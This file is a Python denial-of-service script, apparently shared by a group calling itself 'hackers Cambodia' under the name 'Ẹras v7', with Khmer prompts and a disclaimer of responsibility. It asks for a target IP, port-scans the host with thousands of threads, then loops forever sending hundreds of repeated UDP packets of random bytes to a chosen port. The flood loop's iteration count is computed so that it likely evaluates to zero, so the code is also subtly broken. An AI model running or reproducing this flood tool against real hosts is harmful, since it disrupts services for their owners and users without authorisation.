import socket, threading, os, sys, random, ctypes, time

delay=20
psc=5000
ux=3
port = 1
sent = 0
id=1
svc=[]



sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(1490)
if os.name=='nt':
    os.system('color b')
    os.system('title Ẹras v7')
    ctypes.windll.kernel32.SetConsoleTitleW('Ẹras v7')
else:
    os.system('setterm -background white -foreground white -store')

def cls():
    os.system('cls' if os.name=='nt' else 'clear')
cls()

def type(text):
  words = text
  for char in words:
    time.sleep(0.01)
    sys.stdout.write(char)
    sys.stdout.flush()
    
    
print("ព្រះយើងគឺជាមាតាបិតា")
print(" យើងជាមនុស្សយើងត្រូវដឹងអំពីសេចក**ីល្អ។")
input("សូមរងចាំ......ចុចវាដើម្បីដំណើរការ")
print("👩‍💻🌏🪐hackers Cambodia🌹")
print("ខ្ញុំជាកូនល្អសម្រាប់មាតាបិតា")
type("││ {====>ddos [ក្រុមយើងមានម៉ាជិត៣អ្នក] |: target ip")
print()
ip = input("││ :")
ipp=ip
target=ip
    
    
#
print()
print(" ខ្ញុំ ក្នុងនាមជាអ្នកបង្កើតស្គ្រីបនេះ ខ្ញុំមិនទទួលខុសត្រូវចំពោះអ្វីដែលអ្នកធ្វើជាមួយស្គ្រីបនេះទេ។ចុច Enter ដើម្បីទទួល...")
input("👩‍💻")
print()

type("││ target ip")
print()
ip = input("││ :")
ipp=ip
target=ip



if len(sys.argv) == 2:
    target = socket.gethostbyname(sys.argv[1])


def TCP_connect(ipp, port_number, delay, output):
    TCPsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    TCPsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    TCPsock.settimeout(delay)
    try:
        TCPsock.connect((ipp, port_number))
        output[port_number] = '🇰🇭'
    except:
        output[port_number] = ''

def scan_ports(ipp, delay):

    threads = []
    output = {}


    for i in range(psc):
        t = threading.Thread(target=TCP_connect, args=(ipp, i, delay, output))
        threads.append(t)


    for i in range(psc):
        threads[i].start()


    for i in range(psc):
        threads[i].join()

    for i in range(psc):
        if output[i] == '':
            svc.append(int(i))


def main():
    type("││ ក្រុមយើង ()")
    print()
    delay = int(input("││ :"))
    type("││ port   កម្ពុជា (3 ខ្មែរ)")
    print()
    ux = int(input("││ :"))
    type("││ port (5000 ok,65535 កូដ)")
    print()
    psc=int(input("││ :"))

    type("││ scanning for around ")
    print(delay*ux+(psc*0.002),end=" ")
    type("")
    print()
    for kk in range(ux):
        scan_ports(ipp, delay)
        type("││ កូនល្អ ")
        print(str(kk+1),end="")
        type(" សួរស្តីអ្នកទាំងអស់គ្នា")
        print()

if __name__ == "__main__":
    main()

res = [*set(svc)]

type("││  ports=")
print(res)

type("││  port")
print()

open=int(input("││ :"))

type("││🔨 (5000)")
print()
threads=int(input("││ :"))
if threads<5000:
    sys.exit("⚒️ 5000")
c=(sent+int(threads/100)*100.44)/500
sentstring=round(sent,1)



if os.name=='nt':
    print("││ check អរគុណ││")
else:
    print("││ check មើល││")


nx=len(("││ ID:%s  │  Sent %sMB to %s port:%s"%(str((id)).zfill(4),c,ipp,open)))
print("―"*nx)

while True:
     for i in range(int(threads/10000000000000000000000000000000)):
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
         sock.sendto(bytes, (ipp,int(open)))
